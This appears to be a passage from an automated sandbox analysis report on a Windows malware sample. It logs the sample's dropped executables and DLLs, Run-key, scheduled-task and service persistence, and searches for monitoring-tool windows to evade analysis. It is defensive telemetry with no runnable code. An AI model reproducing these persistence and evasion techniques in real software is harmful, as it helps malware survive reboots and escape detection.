                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\Comn.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\st22BJg[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\msvcp80.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\QtCore4.dllJump to dropped file
                          Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\libssl-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\libssl-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeJump to dropped file
                          Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeJump to dropped file
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeFile created: C:\Windows\Temp\gvh50gjo_3616.sysJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {F1A8D70E-81F9-4200-B46C-ECA432751942}
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r4uYZ44_3616
                          Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {F1A8D70E-81F9-4200-B46C-ECA432751942}
                          Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {F1A8D70E-81F9-4200-B46C-ECA432751942}
                          Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {F1A8D70E-81F9-4200-B46C-ECA432751942}
                          Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {F1A8D70E-81F9-4200-B46C-ECA432751942}

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{89F650DF-16A5-4514-A5F3-FC16C11D3A61} {76E89F63-4483-450E-AC71-B47AF4F1425B}
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
